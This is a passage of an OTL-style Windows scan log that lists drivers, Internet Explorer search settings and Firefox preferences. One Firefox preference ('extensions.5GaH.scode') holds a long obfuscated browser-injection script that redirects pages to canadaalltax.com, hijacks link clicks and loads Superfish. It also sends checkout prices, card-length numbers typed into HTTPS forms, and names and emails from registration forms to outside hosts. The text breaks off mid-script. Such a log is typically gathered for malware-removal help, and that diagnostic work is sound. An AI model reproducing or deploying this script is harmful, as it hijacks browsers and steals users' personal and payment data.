DRV:64bit: - [2013/08/22 13:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:64bit: - [2013/08/22 13:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2013/08/22 13:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2013/08/22 13:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:64bit: - [2013/08/22 13:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2013/08/22 13:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:64bit: - [2013/08/22 13:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:64bit: - [2013/08/22 13:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2013/08/22 13:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2013/08/22 13:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:64bit: - [2013/08/22 13:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2013/08/22 13:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:64bit: - [2013/08/22 13:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:64bit: - [2013/08/22 13:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2013/08/22 13:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:64bit: - [2013/08/22 13:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:64bit: - [2013/08/22 13:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2013/08/22 13:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:64bit: - [2013/08/22 13:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:64bit: - [2013/08/22 13:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:64bit: - [2013/08/22 13:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:64bit: - [2013/08/22 13:37:27 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:64bit: - [2013/08/22 13:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:64bit: - [2013/08/22 12:39:54 | 000,076,800 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:64bit: - [2013/08/22 12:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:64bit: - [2013/08/22 12:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:64bit: - [2013/08/22 12:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:64bit: - [2013/08/22 12:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:64bit: - [2013/08/22 12:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:64bit: - [2013/08/22 12:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:64bit: - [2013/08/22 12:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:64bit: - [2013/08/22 12:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:64bit: - [2013/08/22 12:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:64bit: - [2013/08/22 12:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:64bit: - [2013/08/22 12:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:64bit: - [2013/08/22 12:37:46 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2013/08/22 12:37:42 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:64bit: - [2013/08/22 12:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2013/08/22 12:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:64bit: - [2013/08/22 12:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2013/08/22 12:36:43 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:64bit: - [2013/08/22 12:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:64bit: - [2013/08/22 12:36:17 | 000,124,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:64bit: - [2013/08/22 12:36:07 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:64bit: - [2013/08/22 12:35:42 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:64bit: - [2013/08/22 09:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:64bit: - [2013/08/15 23:28:42 | 000,830,680 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt630x64.sys -- (RTL8168)
DRV:64bit: - [2013/08/13 00:25:46 | 000,017,624 | ---- | M] (Windows ® Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:64bit: - [2013/08/10 01:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:64bit: - [2013/08/07 02:33:40 | 000,590,024 | ---- | M] (Qualcomm Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2013/07/30 19:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:64bit: - [2013/07/25 20:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:64bit: - [2013/07/22 17:45:58 | 000,020,800 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WirelessButtonDriver64.sys -- (WirelessButtonDriver)
DRV:64bit: - [2013/07/01 21:10:20 | 000,087,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\TXEIx64.sys -- (TXEIx64)
DRV:64bit: - [2013/03/05 13:01:42 | 000,091,712 | ---- | M] (CyberLink) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\CLVirtualDrive.sys -- (CLVirtualDrive)
DRV:64bit: - [2013/03/05 07:22:20 | 000,041,408 | ---- | M] (CyberLink Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\clwvd.sys -- (clwvd)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://g.uk.msn.com/CQNOT14/2
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE:64bit: - HKLM\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE:64bit: - HKLM\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://g.uk.msn.com/CQNOT14/2
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE - HKLM\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKLM\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.uk.msn.com/CQNOT14/2
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,First Home Page = http://g.uk.msn.com/CQNOT14/2
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://uk.search.yah...r=spigot-yhp-ie
IE - HKCU\..\SearchScopes,DefaultScope = {7C53F0B8-083A-47A5-8DEE-FF74C88B5A9A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...0TR&pc=CPNTDFJS
IE - HKCU\..\SearchScopes\{7C53F0B8-083A-47A5-8DEE-FF74C88B5A9A}: "URL" = http://uk.search.yah...p={searchTerms}
IE - HKCU\..\SearchScopes\{C1A6073E-F20A-4276-BBAE-47686849F1B1}: "URL" = http://www.amazon.co...s={searchTerms}
IE - HKCU\..\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}: "URL" = http://rover.ebay.co...9550-11896-25/4 ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
========== FireFox ==========
FF - prefs.js..browser.startup.homepage: "www.google.com"
FF - prefs.js..extensions.5GaH.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1){return}}catch(e){};(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax....27054&pid=1&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"Q4BwT86K=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"Q4BwT86K=\")){var d=a.match(/Q4BwT86K=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8znShVWzmPhd97qHsMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pjUFqjY5qdgHqdr6pjaGqHa8qa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&eid=672&hid=9915884634379027054&pid=1&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=pdYKrja5vTwFrG5FqdqXrjnErjg9qHk8qE%3D%3D&eid=672&hid=9915884634379027054&pid=1&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.developpro.info/?pr=1&d=\"+video_id+\"&s=\"+document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=\"+h+\"&s=\"+p}\"justeat.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"checkout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=justeat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.developpro.info/g.php?pr=1&d=titbit.com&s=0\";\"www.grubhub.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"payment\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.grubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.delivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=www.foodler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.developpro.info/g.php?pr=1&d=eat24hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=14358494935046227763&CTID=p1';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var 